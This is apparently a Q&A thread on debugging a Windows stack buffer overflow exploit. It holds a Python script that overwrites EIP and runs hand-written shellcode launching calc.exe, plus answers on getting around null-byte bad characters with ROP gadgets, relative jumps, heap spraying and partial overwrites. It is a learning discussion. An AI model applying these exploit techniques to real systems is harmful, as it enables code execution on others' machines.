# Shellcode not executing despite EIP being overwritten properly

Tags: windows, exploit, shellcode, assembly

Here is my exploit:

```
junk = b'A' * 1032
​
eip = b"\xf5\x93\x4a\x00" # some address where 'jmp esp' lives

shellcode = b""
shellcode += b"\x33\xc0"             # xor eax, eax
shellcode += b"\x50"                 # push eax
shellcode += b"\x68\x2E\x65\x78\x65" # push ".exe"
shellcode += b"\x68\x63\x61\x6C\x63" # push "calc"
shellcode += b"\x8B\xC4"             # mov eax, esp
shellcode += b"\x6A\x01"             # push 1
shellcode += b"\x50"                 # push eax
shellcode += b"\xBB\x30\xCD\x07\x77" # mov ebx, 7707cd30 (location of winexec)
shellcode += b"\xFF\xD3"             # call ebx
​
nopsled = b"\x90" * 30
​
with open("exploit.txt", "wb") as file:
    file.write(junk + eip + nopsled + shellcode)
```

EIP gets overwritten with the correct value, but it doesn't jump to the shellcode, is there something I am missing? I also tried with shellcode generated by `msfvenom` and it didn't work as well, so I think the problem is not the shellcode itself. I am 99% sure the problem is the `\x00` from the EIP, but how can I omit it if the address of `jmp esp` contains it? There is no `jmp esp` in the binary without a leading `\x00`.

Answer (score 1):

You are right, the problem is the `\x00` in `EIP`. This is commonly known as a bad character, you can find more bad chars [here](https://www.ins1gn1a.com/identifying-bad-characters/).

To bypass this issue, you need to use gadgets (Return-Oriented Programing) to jump to `ESP`, for example:

```
0x11223344 mov eax, esp
...
ret
```

And a second gadget that jump to `EAX`:

```
0x55667788 jmp eax
...
ret
```

In this case, the final exploit should be:

```
with open("exploit.txt", "wb") as file:
    file.write(junk + b"\x44\x33\x22\x11" + b"\x88\x77\x66\x55" + nopsled + shellcode)
```

Comment: What if all the ROPs' addresses contain 00?

Answer (score 0):

While using ROP is a viable option, you don't have to use ROP. There are several viable options:

- Use gadgets from a different .dll/.so library with a better base address
- Use a relative jmp: `jmp esp-8` and shift your payload by 8 bytes
- Use a long NOP sled and jump to a fixed stack address which is hopefully within your NOP sled
- If you control several registers load a pre-calculated address into say eax and use a gadget like `sub eax-48;call eax` to pivot to the `jmp esp` address
- Spray the heap and overwrite EIP to a fixed address like `0x0c0c0c0c`
- Put the payload in the junk portion of your payload and find a gadget that increments esp enough to hit inside your junk space then returns. This way you can use a partial overwrite of the address leaving the largest byte with its original value. Given that you're overwriting a return address there is a chance it already contained `0x004a????`

There are many ways to solve these corner cases and getting creative is certainly allowed.